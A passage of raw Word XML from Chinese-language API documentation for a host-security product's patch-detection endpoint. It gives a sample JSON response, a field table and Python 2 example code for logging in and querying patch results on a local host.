        <w:t xml:space="preserve">    data = {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("POST", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def get_linux_patch():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/external/api/vul/patch/linux/list?page=0&amp;size=50" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'page':0, 'size': 50}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = send_request("GET", url, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ", res</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    service_patch_check()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1362DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="查询补丁检测结果"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询补丁检测结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4B7E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF661E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/vul/patch/{linux|win}/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8D60E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CAFC6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>公共参数（详情参见</w:t>
      </w:r>
      <w:hyperlink w:anchor="基本请求方法">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>基本请求方法</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D427CCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABA757A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/win/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E399B37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33047B47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id":"5ab243407d761b1147bfb826",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"a3ec5aca181b179a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"servera.qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTags":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "patchId":"QT012016000970",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id":"5ab243407d761b1147bfb827",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"a3ec5aca181b179a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.6.124",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"servera.qingteng.cn",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "group":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTags":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test2"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "patchId":"QT012015000173",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect":false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFA14A8"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701"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5827"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3F069CE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DF73DE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610ED50E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="111069E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DBAB6E1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E9E1D52" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BBED2A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A3AD4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3C4701" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7CB7A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="009A0F62" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D78751" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="116EEE91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C2F6BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D805DC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2A3E60B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314CDAA6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C6CE70C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E8AD69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0151628D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机显示ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2389E765" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="361012E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21B1505E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A64E34B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B70701C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="20130D22" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C7EE607" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4BA0AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5F78FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CB17CF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7B59827E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15EB9431" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A0D02E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="795F26E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5264AD4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4081108F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F010F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC78A81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5119483C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F509AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D0003DC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32650834" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F88CF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22445338" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3239585F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0432BF81" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A0F679" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1C5AD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70D5F6F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B707483" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="430A31CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E95948" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7812F971" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AF85F89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7575CB6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61B36A1A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79253C3E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24850E43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F80DE02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD1B903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="72B2EA17" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AFA4242" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DCCBD83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="228F14C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661C9CA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否存在进程影响 0/1 无进程影响/有进程影响(仅linux, 并且当前进程影响没有未知状态, 当主机没有进行进程影响扫描的时候, 都是无进程影响, 进程影响每天有定时执行, 所以安装主机后如果要立马知道是否补丁有进程影响, 需要先执行一次进程影响扫描, 或者等第二天定时执行后可以获得补丁是否有进程影响)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54CB675F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A497A76" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /usr/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>from __future__ import absolute_import</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import httplib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import json</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import hashlib</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = httplib.HTTPConnection(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    url = "http://%s:%s/v1/api/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/json"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    json_body = json.dumps(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn.request(method="POST", url=url, body=json_body, headers=header)</w:t>
      </w:r>
